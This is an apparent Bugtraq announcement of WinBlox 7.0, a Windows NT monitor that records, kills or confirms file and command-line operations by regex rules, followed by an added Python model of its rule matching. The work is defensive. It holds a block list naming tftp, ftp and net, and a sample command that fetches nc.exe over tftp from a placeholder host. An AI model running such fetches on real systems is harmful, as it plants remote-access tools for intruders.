SUBJECT : more simple and flexible WinBlox (GET CONTROL OF WINNT SYSTEM)
TO      : bugtraq and dm@securityfocus.com
FROM    : Liu Die Yu

Tell me why the following message didn't get through, and why there is no notification about rejection.

***** ***** ***** ***** *****

Expected Readers
================
WinNT (NT/2K/XP/2K3) users who know that state-of-the-art protection (network firewall, anti-virus, code made by MS) is far from enough.

What is WinBlox
===============
You can understand WinBlox within 15 seconds, while I have spent nearly 3 months on it:
http://umbrella.name/winblox/what_is_winblox.htm
(Requires Macromedia Flash Plugin)

Current WinBlox
===============
Open source and functional, but not tested long enough for operational use yet.
To get up-to-date info, visit: http://umbrella.name/winblox

WinBlox 7.0 Enhancement
=======================

[1/6] USAGE : Get More Simple and Powerful Control
--------------------------------------------------[V]
The software consists of the following 4 files: one setup program (WBD.EXE), one monitor DLL (WBM.DLL), one config file (WBLIST.TXT) and one log file (WBLOG.TXT). (The log file is not shipped with the installation package.)

WBD.EXE    : use the start/stop/status switch to enable WinBlox, remove WinBlox or check the current status of WinBlox.

WBLIST.TXT : defines the actions = {record, filter, confirm} to take when an operation descriptor matches a regular expression pattern.
             The format is: [action_list][regular_expression_pattern]
             ("[regular_expression_pattern]" must start with "^")
             For example:
                 record.filter.^.*iexplore.*
             (record and kill any operation whose descriptor contains "iexplore")

NOTE: the "confirm" action will be treated as "filter" on "COMMANDLINE:" operations. (MessageBox does not work there.)

[2/6] BUGFIX: LNK2005 Error when Compiling WBM (WinBlox Monitor)
----------------------------------------------------------------[V]
Many people reported that the monitor DLL could not be compiled because of an LNK2005 error. Fixed in this release.

[3/6] SPEED : Faster Regular Expression Matching
-----------------------------------------------[V]
The speed is greatly improved by compiling each regex pattern only once, at startup, instead of on every match.
[+] GREAT thanks to Oliver Lavery (olavery AT pivx DzeroT com) for suggesting this improvement.
[QUOTE]
your program will probably be MUCH faster (maybe up to 10x)
[/QUOTE]

[4/6] SPEED : Saved Many "strlen" Calls during Initialization
------------------------------------------------------------[V]
The startup speed of each program is improved by using as few "strlen" calls as possible.
[+] Thanks to David Boyce (d DzeroT boyce AT ntlworld DzeroT com) for suggesting this improvement.

[5/6] SOURCE: Index and Count Clarification
------------------------------------------[V]
Replaced "// 3" with "// count:3,index:2".
[+] Thanks to David Boyce (d DzeroT boyce AT ntlworld DzeroT com) for suggesting this improvement.

[6/6] USAGE : Include Username in Operation Descriptor
-----------------------------------------------------[V]
The username is added to the descriptor of the CreateFile operation, which now has the following format:
"[Username]@CreateFile:[Full_Filename_Of_EXE] > [Commandline] ==> [AccessType] --> [Target_File]"
[+] Thanks to "Paul Jordison" (pjordison AT tablimited DzeroT com DzeroT au)
[QUOTE]
I have a need to check all operation sources and targets from my CITRIX Servers (for network security) [...] it shows that UserA ran application B and was accessing source C?
[/QUOTE]

Features Still in Wish List
===========================

[1/1] System-wide DLL Injection on Win9x
---------------------------------------[_]
WinBlox can work on Win9x if it's possible to inject WBM.DLL into all processes on Win9x. But I have not figured out how to do that yet.
"Bob Dickinson" (bob AT echeguren DzeroT com) and many others wanted this. I don't want to turn them down.

Default Config File
===================
The default config file ("WBLIST.TXT") does the following things:
# IE needs confirmation to write an EXE (unless the access is only WRITE_ATTRIBUTES) - this covers EXE downloads and Adodb.Stream writing to an EXE
# record any file operation whose target filename contains "\_sensitiVe_\"
# kill and record tftp, ftp and net - too many attacks involve these command-line tools

More Strict for Higher Security
===============================
# Only an account named "WRITEEXE" can issue file operations on EXE files.
# As a side-effect, no icon stored in an EXE can be displayed any more.
# kill and record tftp, ftp and net - too many attacks involve these command-line tools

Special Warning: Protect Log File
=================================
For higher security, you need to change the filename of the log file ("WBLOG.TXT"), so that an attacker does not know which file holds the record of his activity.
To change the filename of the log file: change the value of "LOG_FILEID" (specified by a "#define" macro) in the following file:
open\wbm\detours\samples\wbm\wbm.cpp
and re-compile "WBM.DLL". For more information on compiling, visit the official site: http://umbrella.name/

This WBLIST.TXT file is only included in the "All Source Code and Document" package.

===== END OF FILE =====
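As an added example (my own code, not WinBlox's source), the following Python models how the WBLIST.TXT rule format from [1/6] is applied to the [6/6] operation descriptor, using a constructed config modelled on the three default rules listed above, and honouring the NOTE that "confirm" degrades to "filter" on "COMMANDLINE:" operations. It also shows the [3/6] point: patterns are compiled once when the list is loaded, not once per operation. Assumptions not stated on the page: comment lines start with "#", the actions of every matching rule are combined (the real monitor's rule precedence is not described), the regex dialect is Python's re, a command-line operation's descriptor is "COMMANDLINE:" followed by the command line, and the access-type strings (GENERIC_WRITE, GENERIC_READ, WRITE_ATTRIBUTES) are made up for the sample.

```python
"""Model of WinBlox WBLIST.TXT rule matching (added example, not project code)."""
import re
from dataclasses import dataclass

# The three actions named in the WinBlox announcement.
ACTIONS = {"record", "filter", "confirm"}


@dataclass
class Rule:
    actions: frozenset
    pattern: re.Pattern  # compiled once at load time (the [3/6] speed fix)
    raw: str


def parse_wblist(text):
    """Parse lines of the form [action_list][regex]: the regex must start with
    '^' and the dot-separated action list is everything before that caret.
    Assumption: empty lines and lines starting with '#' are comments."""
    rules = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        caret = line.find("^")
        if caret < 0:
            raise ValueError(f"WBLIST.TXT line {lineno}: pattern must start with '^'")
        actions = frozenset(tok for tok in line[:caret].split(".") if tok)
        unknown = actions - ACTIONS
        if unknown:
            raise ValueError(f"WBLIST.TXT line {lineno}: unknown action(s) {sorted(unknown)}")
        rules.append(Rule(actions, re.compile(line[caret:]), line))
    return rules


def create_file_descriptor(user, exe, cmdline, access, target):
    """Build the [6/6] descriptor:
    [Username]@CreateFile:[Full_Filename_Of_EXE] > [Commandline] ==> [AccessType] --> [Target_File]"""
    return f"{user}@CreateFile:{exe} > {cmdline} ==> {access} --> {target}"


def commandline_descriptor(cmdline):
    """Assumption: a command-line operation is described as 'COMMANDLINE:' + command line."""
    return f"COMMANDLINE:{cmdline}"


def decide(rules, descriptor):
    """Apply every matching rule and return the union of their actions (assumed
    combination rule). Per the page's NOTE, 'confirm' on a COMMANDLINE: operation
    becomes 'filter' because no MessageBox can be shown there."""
    result = {"record": False, "filter": False, "confirm": False}
    for rule in rules:
        if not rule.pattern.search(descriptor):
            continue
        for action in rule.actions:
            if action == "confirm" and descriptor.startswith("COMMANDLINE:"):
                action = "filter"
            result[action] = True
    return result


# Constructed WBLIST.TXT modelled on the three default rules the announcement describes.
SAMPLE_WBLIST = r"""
# IE needs confirmation to write an EXE, unless the access is only WRITE_ATTRIBUTES
confirm.^.*@CreateFile:.*\\iexplore\.exe > .* ==> (?!WRITE_ATTRIBUTES).* --> .*\.exe$
# record any file operation whose target filename contains \_sensitiVe_\
record.^.* --> .*\\_sensitiVe_\\.*
# kill and record tftp, ftp and net
record.filter.^COMMANDLINE:.*\b(tftp|ftp|net)(\.exe)?\b.*
# confirm on a COMMANDLINE: operation degrades to filter (see the NOTE)
confirm.^COMMANDLINE:.*\bcmd\.exe\b.*
"""


if __name__ == "__main__":
    rules = parse_wblist(SAMPLE_WBLIST)  # regexes compiled here, once
    ie = r"C:\Program Files\Internet Explorer\iexplore.exe"
    samples = [  # constructed operations, not captured logs
        create_file_descriptor("alice", ie, f'"{ie}"', "GENERIC_WRITE", r"C:\Downloads\setup.exe"),
        create_file_descriptor("alice", ie, f'"{ie}"', "WRITE_ATTRIBUTES", r"C:\Downloads\setup.exe"),
        create_file_descriptor("bob", r"C:\WINNT\system32\notepad.exe", "notepad.exe",
                               "GENERIC_READ", r"C:\_sensitiVe_\payroll.xls"),
        commandline_descriptor("tftp -i 10.0.0.1 GET nc.exe"),
        commandline_descriptor("cmd.exe /c dir"),
    ]
    for d in samples:
        print(decide(rules, d), d)
```

The negative lookahead in the first rule is what implements "unless it's only WRITE_ATTRIBUTES": an IE write of an EXE with any other access type prompts for confirmation, while an attribute-only open passes silently. Whether the monitor's own regex engine supports lookahead is not stated on the page, so check that before copying the pattern into a real WBLIST.TXT.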